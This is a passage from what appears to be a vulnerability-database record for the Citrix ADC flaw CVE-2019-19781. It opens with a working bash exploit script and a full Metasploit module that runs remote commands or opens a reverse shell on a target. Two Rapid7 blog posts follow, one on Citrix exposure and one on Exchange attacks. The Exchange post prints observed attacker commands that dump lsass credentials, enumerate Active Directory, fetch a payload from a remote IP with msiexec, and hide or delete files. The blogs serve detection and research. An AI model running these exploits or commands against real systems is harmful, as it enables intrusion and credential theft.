\\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\n |__/ CVE-2019-19781\n=================================================================================\"\n##############################\nif [ -z \"$1\" ];\nthen\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\nexit;\nfi\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\necho -ne \"Command Output :\\n\"\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "edition": 1, "published": "2020-01-13T00:00:00", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC Remote Code Execution',\n 'Description' => %q(\n An issue was discovered in Citrix Application Delivery Controller (ADC)\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n ),\n 'Author' => [\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['EDB', '47901'],\n ['EDB', '47902']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl meterpreter'\n }\n },\n 'Targets' => [\n ['Unix (remote shell)',\n 'Type' => :cmd_shell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\n 'DisablePayloadHandler' => 'false'\n }\n ],\n ['Unix (command-line)',\n 'Type' => :cmd_generic,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptAddress.new('RHOST', [true, 'The target address'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('RHOSTS')\n end\n\n def execute_command(command, opts = {})\n filename = Rex::Text.rand_text_alpha(16)\n nonce = Rex::Text.rand_text_alpha(6)\n\n request = {\n 'method' => 'POST',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\n 'headers' => {\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => 'http://127.0.0.1',\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\n 'desc' => 'desc',\n 'UI_inuse' => 'RfWeb'\n },\n 'encode_params' => false\n }\n\n begin\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n\n if received.code == 200\n vprint_status(\"#{received.get_html_document.text}\")\n sleep 2\n\n request = {\n 'method' => 'GET',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\n 'headers' => {\n 'NSC_USER' => nonce,\n 'NSC_NONCE' => nonce\n }\n }\n\n ## Trigger to gain exploitation.\n begin\n send_request_cgi(request)\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n return received\n end\n\n return false\n end\n\n def get_chr_payload(command)\n chr_payload = command\n i = chr_payload.length\n\n output = \"\"\n chr_payload.each_char do | c |\n i = i - 1\n output << \"chr(\" << c.ord.to_s << \")\"\n if i != 0\n output << \" . \"\n end\n end\n\n return output\n end\n\n def check\n begin\n received = send_request_cgi(\n \"method\" => \"GET\",\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\n )\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n\n if received && received.code != 200\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n else\n print_good('The target appears to be vulnerable.')\n end\n\n case target['Type']\n when :cmd_generic\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n received = execute_command(payload.encoded)\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\n print_warning('Dumping command output in parsed http response')\n print_good(\"#{received.get_html_document.text}\")\n else\n print_warning('Empty response, no command output')\n return\n end\n\n when :cmd_shell\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n execute_command(payload.encoded)\n end\n end\n\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2020-11-04T16:45:52", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## Citrix ADC/NetScaler (TCP/Various)\n\n_It's like VNC, but like if Plan9 ever escaped Bell Labs and got super popular._\n\n### TLDR\n\n**WHAT IT IS:** A client/server technology\u2014similar to Microsoft Remote Desktop\u2014that provides remote access to applications and/or entire operating systems desktop environments.\n\n**HOW MANY: **62,998 discovered nodes. 62,998 (100%) have Recog service version fingerprints\n\n**VULNERABILITIES: **Tons! Most recently, a [severe, unauthenticated remote code execution vulnerability](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) has been widely exploited since January 2020.\n\n**ADVICE: **Use it! But, keep it patched and use multi-factor authentication.\n\n**ALTERNATIVES: **Microsoft Remote Desktop, VNC, and other similar solutions used behind a well-oiled VPN.\n\nCitrix was founded in 1989 and has a diverse array of remote access solutions over the years. Modern Citrix ADC (application delivery controller) and NetScaler solutions use the Microsoft Remote Desktop Services infrastructure to deliver virtual applications and desktops to remote users. Organizations have the ability to configure stronger access controls than with vanilla Remote Desktop, and there are other optimizations within the Citrix application delivery process that also make it faster and consume less bandwidth than raw Remote Desktop sessions.\n\n### Discovery details\n\nIdentifying Citrix systems on the internet turns out to be pretty easy, since their HTTP and NTP servers [kind of go out of their way](<https://github.com/rapid7/recog/search?q=citrix&unscoped_q=citrix>) to proudly let you know they are, indeed, Citrix systems. This makes it easy for Rapid7 Labs researchers to track the spread of Citrix systems on the internet, and in March 2020, we also developed a method to fingerprint the server version based on the version fingerprint of the Citrix client that is offered for download (again, Citrix going out of its way to help folks identify their systems).\n\nThe Labs team spent time on this effort because attackers keep compromising systems that haven\u2019t patched a [gnarly remote code execution vulnerability](<https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781>), and we have many in-flight projects set up to model patch adoption rates of various technologies.\n\nUnlike many other top 10 country lists in this report, China failed to even beat out Sweden in their internet-facing exposure of Citrix systems.\n\n\n\nThe lack of Citrix in cloud environments makes sense, since this technology is usually associated with virtual desktop infrastructure (VDI), which is almost exclusively found in enterprise/business environments.\n\n### Exposure information\n\nWith an actively exploited vulnerability in play and [regular government warnings](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) about the situation, you\u2019d likely guess that internet-facing Citrix servers were fully patched or had mitigations in place. And, you\u2019d be wrong (again), but this time, the situation isn\u2019t as grim as you might expect.\n\n\n\nOur version fingerprinting technique showed that 73% of internet-facing Citrix systems have patches or mitigations in place, with the remaining 27% either being vulnerable or woefully outdated (thus having other issues to worry about). It has taken five months to get to a patch rate of 73%.\n\n### Attacker\u2019s view\n\nThe vast majority of our Heisenberg honeypot nodes are in cloud environments, and\u2014as we\u2019ve just seen\u2014clouds are not where Citrix tends to live (at least on public internet cloud segments). Back in January, we caught attackers and researchers looking for exploitable systems quite regularly, but that activity has waned (though it hasn\u2019t stopped).\n\n\n\nOur honeypots do not emulate Citrix, so the lack of activity is more likely due to our nodes being ignored after each attacker inventory scan. Attackers may also be reusing initial inventory lists or have already established a foothold on the thousands of systems that took forever to be patched.\n\n### Our advice\n\n**IT and IT security teams **should relentlessly monitor vendor bulletins and CVE reports and patch Citrix environments as soon as possible. With attackers increasingly targeting remote access technologies over the past 18 months, it would also be a good idea to have enhanced monitoring with more detailed logging set up on these systems. \n\n**Cloud providers** likely can just keep doing what they\u2019re doing with regard to Citrix since it does not seem to be widely used, despite [Citrix-provided solutions](<https://www.citrix.com/global-partners/amazon-web-services/citrix-workspace-on-aws.html>) for these environments.\n\n**Government cybersecurity agencies **should keep up the great work they\u2019ve been doing calling attention to threat actor activity and the severity of vulnerabilities in remote access technologies like Citrix.\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)", "modified": "2020-11-04T15:24:04", "published": "2020-11-04T15:24:04", "id": "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "href": "https://blog.rapid7.com/2020/11/04/nicer-protocol-deep-dive-internet-exposure-of-citrix-adc-netscaler/", "type": "rapid7blog", "title": "NICER Protocol Deep Dive: Internet Exposure of Citrix ADC/NetScaler", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. \n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&amp;CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * [T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * [T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and distilled the unique type of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in others reporting on the actor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar 